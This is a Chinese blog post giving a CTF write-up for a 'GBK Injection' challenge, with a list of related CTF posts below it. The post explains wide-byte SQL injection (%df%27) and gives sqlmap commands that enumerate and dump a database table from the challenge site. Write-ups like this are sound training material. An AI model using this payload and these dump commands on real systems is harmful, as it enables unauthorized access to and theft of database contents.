CGCTF——GBK Injection

于 2020-02-10 15:36:30 发布
阅读量394 收藏
点赞数
分类专栏: CTF学习
生活会辜负努力的人,但不会辜负一直努力的人——Leo的个人博客。
本文链接:https://blog.csdn.net/zouchengzhi1021/article/details/104249401
版权

在这里插入图片描述
该题提示是gbk数据库,所以咱们就有利用宽字节注入来解题的思路。
(%df%27是双字节不转义单引号实现注入的方法)
原理参考:https://blog.csdn.net/weixin_42419856/article/details/82872653
参考2:https://lyiang.wordpress.com/2015/06/09/sql%E6%B3%A8%E5%85%A5%EF%BC%9A%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5%EF%BC%88gbk%E5%8F%8C%E5%AD%97%E8%8A%82%E7%BB%95%E8%BF%87%EF%BC%89/

利用sqlmap工具注入:
1.

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --current-db

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --tables -D sae-chinalover

在这里插入图片描述
有6个表,一个一个爆,经尝试,ctf4有flag:
3.

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --dump -T ctf4 -D sae-chinalover

在这里插入图片描述
PS:
遇到gpk编写的数据库就可用双字节注入

LEO-max
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
GBK.rar_GBK
09-14
GBK点阵字体的显示,应用液晶显示屏将所要的汉字显示出来,是非常便捷的程序!
CG-CTF single
YenKoc的博客
04-10 375
一.拖入ida,先静态分析一下 发现有三个函数,点击进去看看 a1为0时,当a2[i]为0时,将自身的值赋值到该位置,a1为0时,就不需要动。 这三个函数都是在暗示这东西是个数独,每行每列,都有1到9的数字,并且不能重复。。。 把之前的数取出来,用在线的数组求解器操作一下 同时写个脚本,将之前不是零的地方改成0,就是flag shudu=[0x00, 0x03, 0x00, 0x06, ...
CG-CTF simple-machine
weixin_30553777的博客
03-30 111
运行一下,输入flag; 用ida打开: input_length和input_byte_804B0C0为重命名的变量;现在一个个看调用的函数。 sub_8048526(): 这个函数使用了mmap分配内存空间,并将首地址和偏移首地址0x8000的地址赋给两个变量:dword_804B160 = (int)v0;dword_804B158 = (int)(v0 + 0x8000);,其实这里就...
CG-ctf re 逆向基础学习
weixin_30314631的博客
03-11 438
Hello,RE! 下载程序后打开 把程序拖进ida 之后F5 查看到了代码 选中字符串点击R 可以得到 galfleW{emoc_oT_W_ERdlro}! emmmm 不是 倒过来 程序结束了 flag{Welcome_To_RE_World!} ReadAsm2 给出了一段c代码 int main(int argc, char co...
CGCTF平台web题writeup
test
10-25 1万+
前言 正文 签到题 10pt tips : 这一定是最简单的 连接 恩,key在源代码中 md5 collision 20pt 连接 直接贴出了代码 $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md5...
CGCTF
weixin_43225801的博客
10-15 1279
CGCTF 第一题,hello,re。 小端序:高位数据放在高位地址,即输出相反; 大端序:高位数据放在低位地址,输出相同。 strcmp:设这两个字符串为str1,str2, 若str1==str2,则返回零; 若str1<str2,则返回负数; 若str1>str2,则返回正数。 ida:R键转换字符;f5查看伪代码。 第二题 下载后,用记事本打开文件,发现是对func函数的汇编解...
GBK.js实现中文编码
03-15
用于js中实现GBK编码。适合使用js进行页面参数传递时,给GBK编码页面传递参数,解决乱码问题。使用时直接引入,然后decode即可,示例如下: const GBK = require("gbk.js"); GBK.decode(data);
GBK2UTF8.zip
12-16
GBK编码的工程,转为UTF8编码的工程
GBK Encoding Support
01-26
sublime text中的乱码现象需要gbk encoding support插件解决。但是自带的插件打开文件总是产生.dump缓存,每次需要打开两次,用此资源替换Sublime Text 2\Pristine Packages下面的原有文件即可解决打开缓存文件问题
GBK.rar_GBK_字体 点阵
09-14
GBK点阵字体的显示,应用液晶显示屏将所要的汉字显示出来,是非常便捷的程序!
CG-CTF-Web-/x00
1stPeak's Blog
07-01 1018
/x00 1.查看题目 2.进入题目,查看地址,如下图所示: 3.进行代码分析: if (isset ($_GET['nctf'])) { //检测nctf变量是否设置并且不为NULL if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE) //ereg,搜索nctf变量匹配的正则,这里的正则是首字母必须匹配到[1-9...
CG-CTF web题(部分)
aceXc
05-11 2436
南邮CTF练习题(http://ctf.nuptzj.cn/) 记录新手努力的每一时刻! 1.签到题 这里采用的是360浏览器,打开题目地址,使用工具——查看源代码即可,这里也可以使用快捷键F12/CTRL+U。 Flag:nctf{flag_admiaanaaaaaaaaaaa} 2.md5 collision 分析代码: 要求 $md51 = md5(‘QNKCDZO’); a=@a = @...
cgctf RE WxyVM1
qq_42192672的博客
12-08 442
之前沉迷各种实验,咕了真的有点久了……咕咕咕 自己分析虚拟机指令的能力一向是比较弱的,应该说主要就是基本没有练过,打算从简单开始练习 基本就是一个这样的一个ELF文件,拖进IDA分析 首先分析main函数 然后分析函数4005B6 流程基本就这样,三个一组,写个脚本逆回去就好 脚本,数据特别多…… dword_601060 = [0xC4, 0x34, 0x22, 0x...
CG-CTF-Web-这题不是WEB
1stPeak's Blog
06-19 916
这题不是WEB 1.查看题目: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190619202147885.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxNjE3MDM0,size_1...
https://cgctf.nuptsast.com/-web-签到题
a3uRa的一个窝
10-13 292
ctrl+u
CG-CTF——你大概需要一个优秀的mac
weixin_43464124的博客
12-02 1784
由于上个星期比赛的原因,发现了自己许许多多的问题,尤其是在python方面,几乎是一片空白,所以这个星期恶补了一下python,算是搞清楚了一些,打算找个题练练手,不能纸上谈兵不是QAQ 这是CG-CTF一道老题了,之前因为不会python一直没写,今天就拿它来看看。 用IDA打开来看,是这样的: 很明显它是经过func1,xfunc1…xfunc5这六个函数一番操作之后达到check函数需要满足...
南邮CTF(cgctf)Misc MD5
天马行空
11-30 2017
题目链接:cgctf 这里有一段丢失的md5密文 e9032???da???08????911513?0???a2 要求你还原出他并且加上nctf{}提交 已知线索 明文为: TASC?O3RJMV?WDJKX?ZM 题目来源:安恒杯   给出一段不完整的md5值,和一段不完整的明文值。思路比较简单,明文中有3个未知的值,枚举即可。 26+26+9=61个字母和数字字符,再加上符号字符...
CGCTF-综合题2-writeup
test
10-26 2446
前言 tips : 没有提示 链接 我个人认为这个题目非常的好,这道题虽然花了很长的时候,但是收获也很大。所以不放在writeup集合中,单独拿出来写了一篇。我写的CGCTF关于web的writeup请移步,点击这里。 正文 首先访问题目,发现好像挺正常的,没有发现什么提示。所以第一步做一个简单信息收集。 已知可能有价值的url http://cms.nuptzj.cn/ 首页 htt...
南邮CTF练习题——web题
热门推荐
dcison的博客
11-11 4万+
南邮CTF部分题解
Delphi GBK编码
最新发布
06-08
GBK编码是中文编码的一种,是由中国国家标准GB2312演变而来的扩展字符集,支持包括繁体中文在内的多种汉字编码。在Delphi中,可以使用AnsiToWideChar和WideCharToMultiByte等函数对GBK编码进行转换。具体实现方式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LEO-max

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值